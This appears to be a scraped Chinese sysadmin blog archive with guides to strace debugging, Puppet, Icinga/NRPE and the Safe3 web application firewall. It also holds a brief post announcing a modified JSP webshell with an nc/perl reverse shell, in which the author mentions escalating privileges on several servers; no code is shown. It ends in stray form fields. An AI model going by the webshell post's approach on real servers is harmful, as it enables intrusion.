read(8, "\1\0\0\1\1*\0\0\2\3def\0\0\0\24RELEASE_LOCK(11"..., 16384) = 75
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
lstat("/mnt", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/mnt/NAS", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/mnt/NAS/pay.funshion.com", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/mnt/NAS/pay.funshion.com/log", {st_mode=S_IFDIR|0755, st_size=20480, ...}) = 0
lstat("/mnt/NAS/pay.funshion.com/log/pay_20111117.log", {st_mode=S_IFREG|0644, st_size=1762494, ...}) = 0
open("/mnt/NAS/pay.funshion.com/log/pay_20111117.log", O_WRONLY|O_CREAT|O_APPEND, 0666) = 9
fstat(9, {st_mode=S_IFREG|0644, st_size=1762494, ...}) = 0
lseek(9, 0, SEEK_CUR) = 0
lseek(9, 0, SEEK_CUR) = 0
flock(9, LOCK_EX
Process 1212 detached

很明显程序在写入pay_20111117.log向nas写文件时进程阻塞了，问题就明显了，nas上多组业务都在大量读写，因此nas后来改为只做文件挂载，而日志等其它东西全部本地化，马上修改其配置文件，业务全部恢复正常，大家在遇到一些自己找不到问题原因的时候，可以多试一下strace跟踪命令，比如你一个服务无法启动，可使用strace service mysqld start，一样可以显示跟踪结果，很容易就问题定位了，至此已完美解决问题

puppet集群化管理【安装】

voilet119@163.com(苦咖啡) — Wed,09 Nov 2011 14:06:06 +0800

以下全为虚拟环境测试，建意使用ruby1.86,puppet为2.7.3版本，特别强调ruby不要使用1.87版本，在跨机房传输中会存在问题

本文全部为tar包编译，适合于centos及redhat系统，特别强调安装完puppet客户端后修改手动编译位置，文中做了说明

实验环境：Vmware +centos 5.4/64 redhat 4.5/64
软件环境： ruby 1.86 mysql为yum包 puppet 2.7.3 facter-1.6.0

服务端：192.168.8.207 puppet
客户端：192.168.8.208 redhat4

客户端服务端配置：
本地解析配置
vi /etc/hosts
192.168.8.207 puppet
192.168.8.208 redhat4

puppet 需要时间同步
yum install -y ntp
ntpdate ntp.api.bz

下载所需tar包
cd ~
wget http://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6.tar.gz
tar zxvf ruby-1.8.6.tar.gz
cd ruby-1.8.6
./configure
make && make install
ln -s /usr/local/lib/ruby /usr/bin/
cd ../

wget http://puppetlabs.com/downloads/facter/facter-1.6.0.tar.gz
tar zxvf facter-1.6.0.tar.gz
cd facter-1.6.0
ruby install.rb
cd ../

wget http://puppetlabs.com/downloads/puppet/puppet-2.7.3.tar.gz
tar zxvf puppet-2.7.3.tar.gz
cd puppet-2.7.3
ruby install.rb

groupadd puppet
useradd -g puppet -s /bin/false -M puppet
puppetmasterd -mkusers
cp conf/redhat/* /etc/puppet/

验证是否成功安装
puppet master
[root@puppet ~]# ps aux |grep puppet |grep -v grep
显示puppet进程...
puppet 3444 0.2 12.0 127136 38168 ? Ssl 11:00 0:00 /usr/bin/ruby /usr/bin/puppet master

服务端：
cp /etc/puppet/server.init /etc/init.d/puppetmasterd
chmod 755 /etc/init.d/puppetmasterd
chkconfig --add puppetmasterd
chkconfig --level 35 puppetmasterd on

pkill puppet 先删除之前的验证进程
service puppetmasterd start 启动
服务端口是8140
查看端口监听
[root@puppet ~]# lsof -i:8140
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
puppetmas 22674 puppet 7u IPv4 395077 TCP *:8140 (LISTEN)

客户端：
cp /etc/puppet/client.init /etc/init.d/puppetd
chmod 755 /etc/init.d/puppetd
chkconfig --add puppetd

chkconfig --level 35 puppetd on

server= CTC-SQUID-231
runinterval =250
listen = true
report = true

须注意：
手动编译puppetd在/usr/local/sbin/puppetd
需要手动修改启动脚本位置（程序在19行的位置）
vi /etc/init.d/puppetd
找到puppetd=${PUPPETD-/usr/sbin/puppetd} 修改为puppetd=${PUPPETD-/usr/local/sbin/puppetd}

也可执行下面shell进行修改
sed -i 's#/usr/sbin/puppetd#/usr/local/sbin/puppetd#' /etc/init.d/puppetd

pkill puppet 先删除之前的验证进程
service puppetd start

在客户端申请证书
[root@redhat4 ~]# puppetd --test --server puppet
warning: peer certificate won't be verified in this SSL session
warning: peer certificate won't be verified in this SSL session
warning: peer certificate won't be verified in this SSL session
Exiting; no certificate found and waitforcert is disabled

如上所示表示已连接上服务端，等待服务端授权
服务器如下操作：
[root@puppet ~]# puppetca --list
redhat4
已经显示客户端请求主机名，将主机授权
[root@puppet ~]# puppetca -s redhat4
notice: Signed certificate request for redhat4
notice: Removing file Puppet::SSL::CertificateRequest redhat4 at '/var/lib/puppet/ssl/ca/requests/redhat4.pem'

在到客户端在次请求
[root@redhat4 ~]# puppetd --test --server puppet
info: Caching catalog for redhat4
info: Applying configuration version '1316439443'
notice: Finished catalog run in 0.05 seconds

如上所示已正经成功

如以上出现error 字样则删除client上的ssl文件夹
err: Could not retrieve catalog from remote server: certificate verify failed
warning: Not using cache on failed catalog
err: Could not retrieve catalog; skipping run

rm -rf /var/lib/puppet/ssl/
再次循环申请证书 puppetd --test --server puppet

完成
证书同主机名绑定，如一方修改了主机名则需重新生成证书

主机删除客户端证书
puppetca --clean 主机名

功能测试
[root@puppet ~]# vi /etc/puppet/manifests/site.pp
node default {
file { "/tmp/funshion.txt":content => "voilet hello,this is test64 to your pc\n";}
}
新加文件需指定权限，否则无法正常执行
chown -R puppet:puppet /etc/puppet/mainfests/site.pp

service puppetmasterd restart 初次建立这个文件须重启服务
client上执行 puppetd --test --server puppet

[root@redhat4 ~]# puppetd --test --server puppet
info: Caching catalog for redhat4
info: Applying configuration version '1316439602'
notice: /Stage[main]//Node[default]/File[/tmp/funshion.txt]/ensure: defined content as '{md5}7e6c72f5e0b42ae25fa133957719a82d'
notice: Finished catalog run in 0.05 seconds

可以看到已经生成文件：/tmp/funshion.txt
[root@redhat4 ~]# cat /tmp/funshion.txt
voilet hello,this is test64 to your pc

icinga安装配置【原创】

voilet119@163.com(苦咖啡) — Mon,07 Nov 2011 16:35:23 +0800

icinga是nagios升级版，其开发人员全部为nagios原小组成员，其绝对免费，在nagios基础上进行二次开发，优化一些文件，其nagios原配置文件直接无缝对接，其安装配置方法如下

中文项目地址

http://icinga-cn.sourceforge.net/

安装基础依赖

yum install libdbi-devel libdbi libdbi-drivers libdbi-dbd-mysql

新增用户组及用户

groupadd www
useradd -g www www

wget http://jaist.dl.sourceforge.net/project/icinga-cn/icinga-cn/icinga-cn-1.5.1/icinga-cn-1.5.1.tar.bz2
tar jxvf icinga-cn-1.5.1.tar.bz2
cd icinga-cn-1.5.1
./configure --prefix=/usr/local/icinga --enable-idoutils --enable-embedded-perl --enable-ssl --with-icinga-user=www --with-icinga-group=www --with-command-user=www --with-command-group=www --with-web-user=www --with-web-group=www --with-httpd-conf=/etc/httpd/conf/conf.d
make all
make install
make install-init
make install-commandmode
make install-idoutils
make install-api
make install-config
make install-webconf

安装nagios插件

tar zxvf nagios-plugins-1.4.15.tar.gz
cd nagios-plugins-1.4.15/
./configure --prefix=/usr/local/icinga --with-cgiurl=/icinga/cgi-bin --with-htmurl=/www --with-nagios-user=www --with-nagios-group=www
make && make install

安装nrpe

tar zxvf icinga-nrpe-HEAD.tar.gz
cd icinga-nrpe
./configure --with-nrpe-user=www --with-nrpe-group=www --with-icinga-user=www --with-icinga-group=www
make
make install

拷贝nrpe文件：

cp src/nrpe /usr/local/icinga/bin
cp sample-config/nrpe.cfg /usr/local/icinga/etc

启动nrpe病检查：

/usr/local/icinga/bin/nrpe -n -c /usr/local/icinga/etc/nrpe.cfg -d
/usr/local/icinga/libexec/check_nrpe -H 127.0.0.1 -n

默认其icinga用户名
user:icingaadmin
pass:admin
如修改密码则使用
htpasswd -c /usr/local/icinga/etc/htpasswd.users icingaadmin

如修改用户名，则须修改cgi.cfg文件，将里面的icingaadm修改为你修改的用户，否则无权限查看主机服务

在其它客户机安装nrpe及nagios插件即可，nrpe配置文件允许监控主机进行数据采集

在客户机安装完成插件及nrpe后，可从服务端向客户端进行连接测试

usr/local/icinga/libexec/check_nrpe -H 192.168.1.128 -c check_load
OK - load average: 0.16, 0.14, 0.06|load1=0.160;1.500;3.000;0; load5=0.140;1.100;2.200;0; load15=0.060;0.900;1.900;0;

如测试硬盘空间check_disk或swap交换分区check_swap等，最后界面如下

修改版jsp webshell，加入nc反弹perl

voilet119@163.com(苦咖啡) — Thu,23 Dec 2010 13:29:39 +0800

最近一直在研究linux服务器java提权及程序反弹，也提权过几台服务器，当然更多的目的是测试exp及服务器权限设置问题，修改了一个shell，以下为截图

WEB应用防火墙 linux版

voilet119@163.com(苦咖啡) — Wed,22 Dec 2010 20:12:41 +0800

你是否因为自己的服务器被注入可是入侵，常让你忙的手忙脚乱，以下方法可以解决你所遇到的问题，感谢开源的强大
主要功能：
黑客防御
Safe3 WEB应用防火墙基于WEB入侵异常检测技术，对WEB应用实施全面、深度防御，能够有效识别、阻止日益盛行的WEB应用黑客攻击（如SQL注入、钓鱼攻击、表单绕过、缓冲区溢出、CGI扫描、目录遍历等）：
SQL注入命令注入 Cookie 注入脚本(XSS、CSRF) 敏感信息泄露恶意代码错误配置目录遍历会话劫持文件包含缓冲区溢出应用层拒绝服务漏洞扫描攻击智能学习功能
通过智能学习防御最新0day攻击。
web应用加速
系统内嵌应用加速模块，通过对各类静、动态页面及部分脚本的高速内存缓存，大大提高访问速度。
敏感信息泄露防护
系统内置安全防护策略，可以灵活定义HTTP/HTTPS错误返回的默认页面，避免因为WEB服务异常，导致敏感信息（如：WEB应用安装目录、WEB服务器版本信息等）的泄露。
网页防篡改
系统提供网页防篡改功能，通过实时检测和保护机制，确保被篡改内容不被访问者浏览到。
负载均衡
系统内置负载均衡模块，实现多网站网站服务器的均衡访问。
访问日志审计
提供WEB应用访问的日志记录、分析、统计管理等。
策略配置
提供自定义安全策略配置，适应各种应用环境。
告警
实时告警，支持邮件、短信等多种方式告警。
系统报表
支持自定义统计，报表支持各类导出格式（WORD、EXCEL、PDF、HTML等）。
本版为原版精简版，功能如下
1.拦截GET sql注入
2.拦截Cookie sql注入
3.拦截XSS跨站攻击
4.拦截web溢出攻击
5.拦截非法http请求方法攻击
6.web负载均衡功能
7.网页压缩节省带宽功能
8.Web加速功能

下载地址：http://www.safe3.com.cn/safe3waf-2.3.zip
1、安装步骤：

（系统要求：Linux 2.6+ 内核，本文中的Linux操作系统为CentOS 5.5）
tar zxvf safe3waf-2.3.tar.gz
cd safe3waf-2.3
make install //默认安装到/usr/local/safe3waf/目录，可自行修改Makefile里面的安装路径

2、修改配置文件

vi /usr/local/safe3waf/etc/safe3waf.conf
webserver 192.168.2.171 80 这段改成要保护的网站的地址，可以添加多个该段做负载均衡
　

3、启动Safe3waf

ulimit -SHn 65535

/usr/local/safe3waf/bin/safe3waf.sh start

4、配置开机自启动

vi /etc/rc.local
在末尾增加以下内容：

引用
ulimit -SHn 65535

/usr/local/safe3waf/bin/safe3waf.sh start
5、优化linux内核参数

/usr/local/safe3waf/bin/optimiz_kernel.sh

第四步:加用户
新ftp账号:
新ftp密码:
系统路径:

第五步:创建域
要添加的域:
域端口: